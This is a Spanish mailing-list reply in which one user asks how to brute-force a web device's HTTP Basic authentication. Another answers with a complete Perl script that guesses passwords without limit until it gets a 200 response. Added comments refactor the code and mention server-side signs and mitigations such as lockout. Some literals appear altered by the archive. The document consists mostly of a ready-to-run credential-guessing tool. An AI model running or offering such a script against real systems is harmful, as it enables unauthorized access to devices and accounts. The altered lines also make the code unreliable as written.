El 05/07/2010 a las 03:28:08PM +0200, Alejandro Vargas escribió:
> Tengo un dispositivo accesible por web que parece que tiene una clave
> para determinadas funciones que no es la normal. Alguien conoce un
> programa para atacar páginas web con autenticación básica por fuerza
> bruta?

Hace tiempo hice un script para algo similar. Necesita el módulo
LWP::UserAgent (aptitude install libwww-perl)

Slds
-- 
Horacio
#!/usr/bin/perl
#
use LWP::UserAgent;

$alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 `...@#\$%^&*()-_=+[{]}\\|;:'\",<.>/?";

# Parameters
#
# NOTE(review): the values below are the author's placeholders.  The alphabet
# literal above and the request line in the loop appear to have been altered
# by the list archive; both are left exactly as found.
###############################################################################

$clave_inicial = '';
$realm         = 'AuthName';			# Name/realm
$user          = 'userName';			# User name
$url           = 'www.domain.com:80';
$path          = 'private/';

###############################################################################

# One shared HTTP client; timeout() is in seconds and applies per request.
my $ua = LWP::UserAgent->new;
$ua->timeout(10);

# Unbounded loop: one candidate password and one GET per iteration, with no
# delay between requests and no upper limit on the number of attempts.  The
# only exit is a response whose status code is 200.
#
# What this looks like from the server side: a sustained run of 401 responses
# for a single path from a single client.  Unless the agent string is changed,
# LWP::UserAgent identifies itself as "libwww-perl/<version>".  Failed-login
# rate limiting or temporary lockout on the Basic-auth realm stops this
# pattern, and the size of the search space is governed by password length.
# The request uses plain http://, so Basic credentials are sent unencrypted.
while (1) {

  # Next candidate from the enumerator defined further down in this file.
  $bfpass = bruteforce($alphabet, $clave_inicial);
  # credentials(netloc, realm, user, password): registers the pair LWP uses
  # when the server answers with a Basic challenge for that realm.
  $ua->credentials($url, $realm, $user => $bfpass);
  $response = $ua->get("http://$url/$path";);

  # Any 200 is treated as a successful authentication.
  if ($response->code == 200) {
     print("Clave: $bfpass\n");
	 exit;
  }

}


#
# de http://www.xenocafe.com/tutorials/perl/bruteforce_password_recovery
#

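BEGIN {

# State shared between calls: the candidate returned by the previous call.
# It stays a package variable, as in the original, and is assigned inside
# BEGIN so that it is initialised before the main loop near the top of the
# file runs.  (The original assigned to a misspelled "$curentPWD" here, so the
# variable that bruteforce() actually reads was never initialised.)
$currentPWD = "";

# bruteforce($alphabet, $start)
#
# Returns the next string in an odometer-style enumeration over $alphabet:
# every string of length 1 in alphabet order, then every string of length 2,
# and so on.  The first call returns $start when it is non-empty, otherwise
# the first alphabet character.  A character of the current string that is
# not part of $alphabet is replaced by the first alphabet character.
#
# The number of strings of length n is length($alphabet) ** n, which is why
# password length, more than character variety, bounds how long such an
# enumeration takes against a service that does not throttle attempts.
sub bruteforce {
  my ($ab, $startPWD) = @_;

  my $firstChar = substr($ab, 0, 1);
  my $lastChar  = substr($ab, -1, 1);

  # First call with a caller-supplied starting point: hand it back unchanged.
  if (defined $startPWD && $startPWD ne "" && $currentPWD eq "") {
    $currentPWD = $startPWD;
    return $currentPWD;
  }

  # First call without a starting point: begin with the first character.
  if ($currentPWD eq "") {
    $currentPWD = $firstChar;
    return $currentPWD;
  }

  # Every position already holds the last character: roll over to a string
  # one character longer, made entirely of the first character.
  if ($currentPWD eq ($lastChar x length($currentPWD))) {
    $currentPWD = $firstChar x (length($currentPWD) + 1);
    return $currentPWD;
  }

  # Increment with carry, starting at the rightmost position.  Lexical
  # variables replace the package globals the original wrote to, and scalar
  # element access replaces the one-element slices (@tmpPWD[$x]).
  my @chars   = split(//, $currentPWD);
  my $lastPos = index($ab, $lastChar);

  for (my $x = $#chars; $x >= 0; $x--) {
    my $pos = index($ab, $chars[$x]);

    if ($pos == $lastPos) {
      # Carry: reset this position and continue with the one to its left.
      $chars[$x] = $firstChar;
    } else {
      $chars[$x] = substr($ab, $pos + 1, 1);
      last;
    }
  }

  $currentPWD = join("", @chars);

  return $currentPWD;
}

}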

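# fillString($len, $char)
#
# Returns $char repeated $len times; $len is expected to be a non-negative
# integer, and a $len of zero or less yields the empty string.
#
# Uses the repetition operator instead of a counting loop.  The original loop
# wrote to the undeclared package variables $str and $i, and $i is also the
# loop counter of getPos(), so the two subs shared one global.
sub fillString {
  my ($len, $char) = @_;
  return "" if $len <= 0;
  return $char x $len;
}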

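# getPos($alphabet, $char)
#
# Returns the zero-based position of the first occurrence of the single
# character $char in $alphabet, or -1 when it does not occur (the same
# convention as Perl's index()).
#
# The original fell off the end of its loop when nothing matched, so the
# return value in that case was whatever the loop last evaluated; it also
# used the undeclared package variable $i as its counter.
sub getPos {
  my ($ab, $char) = @_;

  # The original compared one character at a time, so only a one-character
  # $char could ever match; keep that contract explicit.
  return -1 unless defined $char && length($char) == 1;

  return index($ab, $char);
}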
